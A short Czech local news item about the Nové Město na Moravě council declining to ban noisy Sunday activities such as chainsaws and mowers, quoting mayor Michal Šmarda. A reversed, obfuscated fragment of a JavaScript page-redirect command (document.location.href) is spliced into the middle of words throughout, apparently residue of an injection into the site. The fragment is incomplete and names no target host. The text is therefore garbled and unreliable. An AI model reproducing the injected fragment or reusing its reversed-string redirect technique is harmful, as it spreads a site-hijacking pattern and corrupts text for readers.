Rainbow page separator

Radnice neplánuje zakázat nedělní hlučné činnosti

Pátek, 9. ledna 2015

Zahrada a pes

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / O možnosti eliminace rušení klidu o nedělích na základě dotazů obyvatel hovořili novoměstští zastupitelé. Konkrétně se jednalo o používání hlučných strojů, jako jsou například mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torové pily, cirkulárky, křovinořezy či travní sekačky, což některé obyvatele Nového Města obtěžuje. Současně však ve městě neexistuje žádný předpis, který by nedělní používání hlučných zařízení zapovídal.
„Již v minulosti se zastupitelstvo otázkou přijetí vyhlášky omezující hlučné činnosti o víkendech a svátcích zabývalo. Dospělo k názoru, že se ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to problematika má spíše řešit v rámci sousedských vztahů, nikoliv přijímáním zakazujících opatření prostřednictvím obecně závazného právního předpisu města,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval starosta Nového Města na Moravě Michal Šmarda.

fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie z fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobanky www.pixmac.cz